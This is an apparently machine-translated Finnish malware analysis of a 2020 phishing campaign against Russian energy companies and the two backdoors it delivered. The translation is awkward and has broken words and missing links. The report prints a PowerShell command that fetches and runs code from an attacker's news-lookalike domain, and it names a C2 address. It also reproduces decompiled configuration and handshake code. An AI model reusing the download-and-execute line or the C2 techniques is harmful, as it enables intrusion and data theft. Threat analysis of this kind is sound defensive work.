Kokemuksemme tietoturvahäiriöiden tutkimisesta osoittaa, että sähköposti on edelleen yksi yleisimmistä kanavista, joita hyökkääjät käyttävät aluksi tunkeutuakseen verkkoinfrastruktuureihin, joihin hyökätään. Yhdestä huolimattomasta toiminnasta epäilyttävän (tai ei niin epäilyttävän) kirjeen kanssa tulee sisääntulopiste lisätartunnalle, minkä vuoksi kyberrikolliset käyttävät aktiivisesti sosiaalisen manipuloinnin menetelmiä, vaikkakin vaihtelevalla menestyksellä.
Tässä viestissä haluamme puhua äskettäisestä tutkimuksestamme roskapostikampanjasta, joka on kohdistettu useisiin Venäjän polttoaine- ja energiakompleksin yrityksiin. Kaikki hyökkäykset seurasivat samaa skenaariota käyttämällä väärennettyjä sähköposteja, eikä kukaan näyttänyt panostaneen paljon näiden sähköpostien tekstisisältöön.
tutkiminen
Kaikki alkoi huhtikuun 2020 lopussa, kun Doctor Web -virusanalyytikot havaitsivat roskapostikampanjan, jossa hakkerit lähettivät päivitetyn puhelinluettelon useiden Venäjän polttoaine- ja energiakompleksin yritysten työntekijöille. Tämä ei tietenkään ollut pelkkä huoli, koska hakemisto ei ollut todellinen ja .docx-dokumentit ladasivat kaksi kuvaa etäresursseista.
Yksi niistä ladattiin käyttäjän tietokoneelle uutis[.]zannews[.]com-palvelimelta. On huomionarvoista, että verkkotunnus on samanlainen kuin Kazakstanin korruption vastaisen mediakeskuksen verkkotunnus zannews[.]kz. Toisaalta käytetty verkkotunnus muistutti välittömästi toista vuoden 2015 kampanjaa, joka tunnettiin nimellä TOPNEWS, joka käytti ICEFOG-takaovea ja jonka nimissä oli troijalaisten ohjausalueita, joiden nimessä oli alimerkkijono "news". Toinen mielenkiintoinen ominaisuus oli, että lähetettäessä sähköposteja eri vastaanottajille, kuvan latauspyynnöissä käytettiin joko erilaisia pyyntöparametreja tai yksilöllisiä kuvien nimiä.
Uskomme, että tämä tehtiin tietojen keräämiseksi "luotettavan" vastaanottajan tunnistamiseksi, joka sitten taattaisiin avaavansa kirjeen oikeaan aikaan. SMB-protokollaa käytettiin kuvan lataamiseen toiselta palvelimelta, mikä voitiin tehdä NetNTLM-tiivisteiden keräämiseksi vastaanotetun asiakirjan avaneiden työntekijöiden tietokoneilta.
Ja tässä on itse kirje väärennetyn hakemiston kanssa:
Tämän vuoden kesäkuussa hakkerit alkoivat käyttää uutta verkkotunnusta, sports[.]manhajnews[.]com, kuvien lataamiseen. Analyysi osoitti, että manhajnews[.]com-aliverkkotunnuksia on käytetty roskapostiviesteissä ainakin syyskuusta 2019 lähtien. Yksi tämän kampanjan kohteista oli suuri venäläinen yliopisto.
Myös hyökkäyksen järjestäjät keksivät kesäkuuhun mennessä kirjeilleen uuden tekstin: tällä kertaa asiakirja sisälsi tietoa alan kehityksestä. Kirjeen teksti osoitti selvästi, että sen kirjoittaja joko ei puhunut venäjää äidinkielenään tai loi tarkoituksella sellaisen vaikutelman itsestään. Valitettavasti teollisuuden kehittämisideat, kuten aina, osoittautuivat vain kanneksi - dokumenttiin ladattiin jälleen kaksi kuvaa, kun taas palvelin vaihtui download[.]inklingpaper[.]comiksi.
Seuraava innovaatio seurasi heinäkuussa. Yrittäessään ohittaa virustorjuntaohjelmien haitallisten asiakirjojen havaitsemisen hyökkääjät alkoivat käyttää salasanalla salattuja Microsoft Word -asiakirjoja. Samaan aikaan hyökkääjät päättivät käyttää klassista social engineering -tekniikkaa - palkintoilmoitusta.
Vetoomuksen teksti kirjoitettiin jälleen samalla tyylillä, mikä herätti lisäepäilyjä vastaanottajassa. Myöskään kuvan latauspalvelin ei muuttunut.
Huomaa, että kaikissa tapauksissa kirjeiden lähettämiseen käytettiin mail[.]ru- ja yandex[.]ru-verkkotunnuksiin rekisteröityjä sähköpostilaatikoita.
hyökkäys
Syyskuun 2020 alkuun mennessä oli aika toimia. Virusanalyytikot tallensivat uuden hyökkäysaallon, jossa hyökkääjät lähettivät jälleen kirjeitä puhelinluettelon päivittämisen verukkeella. Tällä kertaa liite sisälsi kuitenkin haitallisen makron.
Avattaessa liitettyä asiakirjaa makro loi kaksi tiedostoa:
- VBS-komentosarja %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, jonka oli tarkoitus käynnistää erätiedosto;
- Itse erätiedosto %APPDATA%configstest.bat, joka on hämärtynyt.
Sen työn ydin on Powershell-kuoren käynnistäminen tietyillä parametreilla. Shellille välitetyt parametrit puretaan komennoiksi:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Kuten esitetyistä komennoista seuraa, verkkotunnus, josta hyötykuorma ladataan, on jälleen naamioitu uutissivustoksi. Yksinkertainen , jonka ainoa tehtävä on vastaanottaa shell-koodi komento- ja ohjauspalvelimelta ja suorittaa se. Pystyimme tunnistamaan kahden tyyppisiä takaovia, jotka voidaan asentaa uhrin tietokoneelle.
BackOor.Siggen2.3238
Ensimmäinen on BackOor.Siggen2.3238 — Asiantuntijamme eivät olleet aiemmin törmänneet tähän ohjelmaan, eivätkä muut virustentorjuntavalmistajat myöskään maininneet tästä ohjelmasta.
Tämä ohjelma on C++-kielellä kirjoitettu takaovi, joka toimii 32-bittisissä Windows-käyttöjärjestelmissä.
BackOor.Siggen2.3238 pystyy kommunikoimaan hallintapalvelimen kanssa käyttämällä kahta protokollaa: HTTP ja HTTPS. Testattu näyte käyttää HTTPS-protokollaa. Palvelimelle lähetetyissä pyynnöissä käytetään seuraavaa User-Agentia:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Tässä tapauksessa kaikki pyynnöt toimitetaan seuraavilla parametreilla:
%s;type=%s;length=%s;realdata=%send
jossa jokainen rivi %s korvataan vastaavasti seuraavalla:
- tartunnan saaneen tietokoneen tunnus,
- lähetettävän pyynnön tyyppi,
- realdata-kentän tietojen pituus,
- tiedot.
Saastuneen järjestelmän tietojen keräämisvaiheessa takaovi luo seuraavanlaisen rivin:
lan=%s;cmpname=%s;username=%s;version=%s;
missä lan on tartunnan saaneen tietokoneen IP-osoite, cmpname on tietokoneen nimi, käyttäjätunnus on käyttäjänimi, versio on rivi 0.0.4.03.
Nämä tiedot sysinfo-tunnisteella lähetetään POST-pyynnön kautta ohjauspalvelimelle, joka sijaitsee osoitteessa https[:]//31.214[.]157.14/log.txt. Jos vastauksena BackOor.Siggen2.3238 vastaanottaa HEART-signaalin, yhteyden katsotaan onnistuneen ja takaovi aloittaa pääasiallisen viestinnän palvelimen kanssa.
Tarkempi kuvaus toimintaperiaatteista BackOor.Siggen2.3238 on meidän .
BackOor.Whitebird.23
Toinen ohjelma on muunnos BackDoor.Whitebird-takaovesta, jonka tunnemme jo Kazakstanin valtion viraston kanssa tapahtuneesta tapauksesta. Tämä versio on kirjoitettu C++-kielellä ja se on suunniteltu toimimaan sekä 32- että 64-bittisissä Windows-käyttöjärjestelmissä.
Kuten useimmat tämän tyyppiset ohjelmat, BackOor.Whitebird.23 suunniteltu luomaan salattu yhteys ohjauspalvelimeen ja saastuneen tietokoneen luvaton valvonta. Asennettu vaarantuneeseen järjestelmään tiputtimen avulla .
Tutkimamme näyte oli haitallinen kirjasto, jossa oli kaksi vientiä:
- Google Play
- Testi.
Työnsä alussa se purkaa takaoven runkoon kiinteästi kytketyn konfiguraation salauksen käyttämällä algoritmia, joka perustuu XOR-operaatioon tavulla 0x99. Kokoonpano näyttää tältä:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Jatkuvan toiminnan varmistamiseksi takaovi muuttaa kenttään määritettyä arvoa työtunnit kokoonpanot. Kentässä on 1440 tavua, jotka ottavat arvot 0 tai 1 ja edustavat vuorokauden jokaisen tunnin jokaista minuuttia. Luo erillisen säikeen jokaiselle verkkoliittymälle, joka kuuntelee liitäntää ja etsii valtuutuspaketteja tartunnan saaneelta tietokoneelta välityspalvelimelta. Kun tällainen paketti havaitaan, takaovi lisää tiedot välityspalvelimesta luetteloonsa. Lisäksi tarkistaa välityspalvelimen olemassaolon WinAPI:n kautta InternetQueryOptionW.
Ohjelma tarkistaa nykyisen minuutin ja tunnin ja vertaa niitä kentällä oleviin tietoihin työtunnit kokoonpanot. Jos päivän vastaavan minuutin arvo ei ole nolla, muodostetaan yhteys ohjauspalvelimeen.
Yhteyden muodostaminen palvelimeen simuloi yhteyden luomista asiakkaan ja palvelimen välillä TLS version 1.0 -protokollaa käyttäen. Takaoven rungossa on kaksi puskuria.
Ensimmäinen puskuri sisältää TLS 1.0 Client Hello -paketin.
Toinen puskuri sisältää TLS 1.0 Client Key Exchange -paketteja, joiden avaimen pituus on 0x100 tavua, Change Cipher Spec, Encrypted Handshake Message.
Kun lähetetään Client Hello -paketti, takaovi kirjoittaa Client Random -kenttään 4 tavua nykyisestä ajasta ja 28 tavua näennäissatunnaista dataa, joka lasketaan seuraavasti:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Vastaanotettu paketti lähetetään ohjauspalvelimelle. Vastaus (Server Hello -paketti) tarkistaa:
- yhteensopivuus TLS-protokollan version 1.0 kanssa;
- asiakkaan määrittämän aikaleiman (Satunnaisdata-pakettikentän ensimmäiset 4 tavua) vastaavuus palvelimen määrittelemään aikaleimaan;
- aikaleiman jälkeisten neljän ensimmäisen tavun vastaavuus asiakkaan ja palvelimen Random Data -kentässä.
Määritettyjen osumien tapauksessa takaovi valmistelee Client Key Exchange -paketin. Tätä varten se muuttaa julkista avainta Client Key Exchange -paketissa sekä Encryption IV -salausta ja salaustietoja Encrypted Handshake Message -paketissa.
Sitten takaovi vastaanottaa paketin komento- ja ohjauspalvelimelta, tarkistaa, että TLS-protokollan versio on 1.0, ja hyväksyy sitten vielä 54 tavua (paketin runko). Tämä päättää yhteyden määrityksen.
Tarkempi kuvaus toimintaperiaatteista BackOor.Whitebird.23 on meidän .
Päätelmät ja päätelmät
Asiakirjojen, haittaohjelmien ja käytetyn infrastruktuurin analysointi antaa meille mahdollisuuden sanoa varmuudella, että hyökkäyksen valmisteli yksi kiinalaisista APT-ryhmistä. Ottaen huomioon uhrien tietokoneille asennettujen takaovien toimivuuden onnistuneen hyökkäyksen sattuessa, tartunta johtaa vähintään luottamuksellisten tietojen varastamiseen hyökkäyksen kohteena olevien organisaatioiden tietokoneilta.
Lisäksi erittäin todennäköinen skenaario on erikoistuneiden troijalaisten asentaminen paikallisille palvelimille, joissa on erityistoiminto. Nämä voivat olla toimialueen ohjaimia, sähköpostipalvelimia, Internet-yhdyskäytäviä jne. Kuten näimme esimerkissä , tällaiset palvelimet ovat erityisen kiinnostavia hyökkääjille useista syistä.
Lähde: will.com